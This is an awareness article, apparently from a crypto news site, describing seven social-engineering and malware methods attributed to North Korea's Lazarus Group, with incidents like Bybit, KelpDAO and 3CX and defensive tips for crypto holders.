Key Takeaways
North Korea crypto hacking has become one of the biggest security threats in digital assets. Lazarus Group, a North Korea-linked hacker group, has moved far beyond basic phishing emails. It now uses fake recruiters, fake crypto companies, malicious code libraries, and more to steal your funds.
The Group’s scale is no longer one of potential, but a real threat. The FBI said North Korea stole about $1.5 billion from Bybit in February 2025, then moved assets across thousands of addresses.
Chainalysis later linked a roughly $292 million KelpDAO bridge exploit in April 2026 to Lazarus Group, while TRM Labs said North Korean hackers accounted for 76% of all crypto hack value through April 2026 with just two attacks: Drift Protocol and KelpDAO.
Now, Lazarus rarely steals funds and cashes out all at once. Investigators tend to see quick swaps, wallet splitting, and mixers before a conversion into fiat. In the Bybit case, Chainalysis noted intermediary wallets, decentralized exchanges (DEXs), cross-chain bridges, and no-KYC swap services were used.
Mixers are a major part of this theft, though. The US Treasury for Terrorism and Financial Intelligence said Blender.io helped launder Axie Infinity proceeds, Sinbad processed funds from Lazarus-linked thefts, and even Tornado Cash had been accused of laundering more than $455 million tied to Lazarus before US sanctions came into play. ChipMixer, meanwhile, was taken down after allegedly processing more than $3 billion in unlawful transactions, including state-sponsored crypto theft.
Utilizing these tactics, here are seven hidden Lazarus Group attack methods you should know.
Fake job offers remain one of the most dangerous Lazarus Group methods. Instead of sending obvious spam, attackers pretend to be recruiters, investors, or hiring managers. From there, they contact crypto-related workers through LinkedIn, Facebook, Reddit, or GitHub and ask them to open a file, clone a repository, or complete a “test task.”

Doing what the attacker asks can run malicious code that installs malware on your device. “Graphalgo” is a recent example, using fake crypto job tasks and malicious npm/PyPI packages to target developers.
Lazarus also hides malware inside software that appears useful. A fake crypto trading app may include a remote access trojan (RAT) that lets attackers spy on your device to steal credentials.
An older AppleJeus campaign had North Korea using malware posing as crypto trading platforms since at least 2018, including fake tools built for both Windows and macOS. More recent campaigns use the same idea but break it up into smaller pieces through malicious dependencies and fake utilities, such as graphalgo.
Before downloading any crypto-related software, consult with independent reviews, its GitHub history, and whether or not it asks for unnecessary wallet access.
Lazarus often attacks the people or systems around a smart contract in an attempt to exploit it. For example, the Ronin Network hack showed how social engineering can affect on-chain behavior, with hackers taking over enough of the network’s validator nodes to move funds against their will.
The 2026 KelpDAO attack was an updated version of this. Attackers compromised off-chain infrastructure and tricked a bridge into releasing funds against a non-existent burn. On-chain transactions looked valid, so normal transaction monitoring couldn’t capture it.

To help avoid this, DeFi investors should check smart contract audits, bridge design, validator setup, and whether or not a protocol monitors cross-chain balances in real time.
Supply chain attacks work because victims trust their software will work as intended. Instead of attacking you directly, hackers break into a tool or app that many people already use.
This is what happened in the 2023 3CX attack. Mandiant said the hackers first used poisoned software from Trading Technologies. That bad software then helped them break into 3CX, a company that makes phone and communication tools. Mandiant said that was the first known case where one software supply chain attack led to another. It also linked the activity to a North Korea-related hacker group.
If you’re a user, you’d never be aware of this. You’d just see your app require an update, and your screen would look normal. But it may have delivered malware in the background.
Sometimes, Lazarus attacks pretend to be useful business contacts. They may act like venture capital investors, market makers, legal advisors, or Web3 partners.
They attempt to earn your trust before sending anything dangerous, perhaps messaging you as a crypto founder on Telegram or sending a fake investment deck. They may also study your online presence ahead of time and send a personalized message, throwing you off guard.

In 2026, Lazarus-linked BlueNoroff used this method. Attackers pretended to be a fintech legal contact, sent victims a Calendly invite, then pushed them toward a fake Zoom link. Heading there allowed attackers to target your browser data and wallet extensions.
Browser and clipboard attacks are simple, but they can be very damaging.
You may copy a wallet address as normal, but malware will hijack your clipboard and change the address before you paste it. You might think you’re sending funds to a friend’s wallet, but instead the address belongs to an attacker.
BlueNoroff’s fake Zoom case also had attackers using clipboard hijacking as part of their larger attack.
Your safest habit to integrate is checking a wallet address before every transfer. Compare the first few and last few characters on your hardware wallet or trusted device screen, not just in the browser. Also, remove browser extensions you no longer use, and never approve wallet pop-ups while you are on a call with someone pushing you to move fast.
Wallet recovery scams target people when they’re scared about losing their funds. After a hack, failed login, or wallet error, victims may search online for recovery help. Attackers use that moment to create fake recovery websites, support pages, and tools that promise to restore your lost funds.
The Atomic Wallet hack is one major investor-facing example. Losses hit around $100 million and linked the incident to Lazarus Group, with over 5,000 wallets appearing to be affected.
Here’s a quick checklist to help mitigate theft:
But perhaps most importantly, assume Lazarus Group crypto attacks aim at your trust. They want you to trust a job offer, a meeting invite, a software update. Slow down before committing to actions that affect your keys.
Lazarus targets crypto because it moves fast, crosses borders, and can be harder to recover once stolen. Officials say North Korea uses stolen crypto to support state activity. Linked cases include Ronin/Axie Infinity, Harmony Horizon, Atomic Wallet, Stake.com, Bybit, and KelpDAO. Investigators follow wallet activity, swaps, bridges, and exchange deposits across public blockchains. They also work with exchanges to freeze stolen funds. Watch for fake job offers, urgent test tasks, fake links, strange wallet prompts, changed wallet addresses, and anyone asking for your seed phrase.